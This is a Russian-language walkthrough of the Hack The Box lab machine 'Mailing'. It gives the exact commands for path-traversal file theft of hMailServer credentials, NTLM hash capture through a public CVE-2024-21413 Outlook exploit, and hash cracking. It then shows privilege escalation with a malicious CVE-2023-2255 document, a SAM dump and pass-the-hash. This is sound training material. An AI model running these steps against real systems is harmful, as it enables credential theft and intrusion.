Telegram / Boosty / Видео
Подпишись на канал t.me/kiberdruzhinnik, чтобы не пропускать контент.
Также на https://boosty.to/kiberdruzhinnik/posts/b01f9877-40c1-490f-ad92-769b4a7ca08e я опубликовал подробный видео разбор этой задачи. Это может быть полезно для обучения, если вы делаете первые шаги в информационной безопасности. Поддержать меня на Boosty.
Обзор сервисов
Пробуем сканировать порты машины:
Open 10.129.57.210:993
Open 10.129.57.210:587
Open 10.129.57.210:465
Open 10.129.57.210:445
Open 10.129.57.210:143
Open 10.129.57.210:139
Open 10.129.57.210:135
Open 10.129.57.210:110
Open 10.129.57.210:80
Open 10.129.57.210:25
Open 10.129.57.210:5040
Веб
Занесем домен mailing.htb
в /etc/hosts
.
Ссылка на скачивание инструкции выглядит так: http://mailing.htb/download.php?file=instructions.pdf
и содержит в себе Local File Inclusion.
Попробуем выкачать файл настроек http://mailing.htb/download.php?file=..\..\..\..\..\Program Files (x86)\hMailServer\Bin\hMailServer.ini
:
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
Из этого файла находим два MD5-хеша, которые пробуем проверить на crackstation.net
, один из которых дает нам хеш администратора hMailServer
.
Попробуем воспользоваться уязвимостью в Outlook, чтобы украсть NetNTLMv2 хеш пользователя maya
(мы узнали об этом пользователе из главной страницы и инструкции):
Раскручиваем Responder:
python3 Responder.py -I tun0
И готовим нагрузку для CVE-2024-21413 Outlook:
git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
cd CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username [email protected] --password *** --sender [email protected] --recipient [email protected] --url '\\10.10.14.107\test\exploit' --subject hello
Теперь придется подождать некоторое время, пока maya
не посмотрит наше сообщение. В конце концов, мы ловим хеш:
Копируем его в файл hash.txt
и пробуем сбрутить:
hashcat -a 0 -m 5600 hash.txt rockyou.txt
В результате получаем креды, которые мы можем использовать для подключения с помощью evil-winrm
:
evil-winrm -i mailing.htb -u maya -p ***
Флаг пользователя
Повышение привилегий
Пробуем найти запланированные задачи и находим странную задачу из-под пользователя localadmin
:
Похоже, что мы можем использовать CVE-2023-2255 для повышения привилегий.
Добавим maya
в группу администраторов:
git clone https://github.com/elweth-sec/CVE-2023-2255
cd CVE-2023-2255
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'
Загрузим документ в C:\Important Documents
:
*Evil-WinRM* PS C:\> cd "C:/Important Documents"
*Evil-WinRM* PS C:\Important Documents> upload exploit.odt
Немного подождем и проверим группы пользователя maya
:
*Evil-WinRM* PS C:\Important Documents> net user maya
User name maya
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2024-04-12 4:16:20 AM
Password expires Never
Password changeable 2024-04-12 4:16:20 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2024-05-05 11:56:14 AM
Logon hours allowed All
Local Group Memberships *Administradores *Remote Management Use
*Usuarios *Usuarios de escritori
Global Group memberships *Ninguno
The command completed successfully.
С помощью crackmapexec
дампнем хеши:
podman run -it --rm docker.io/heywoodlh/crackmapexec smb mailing.htb -u maya -p "***" --sam
Теперь с помощью evil-winrm
подключимся с помощью Pass-the-Hash:
evil-winrm -i mailing.htb -u localadmin -H "***"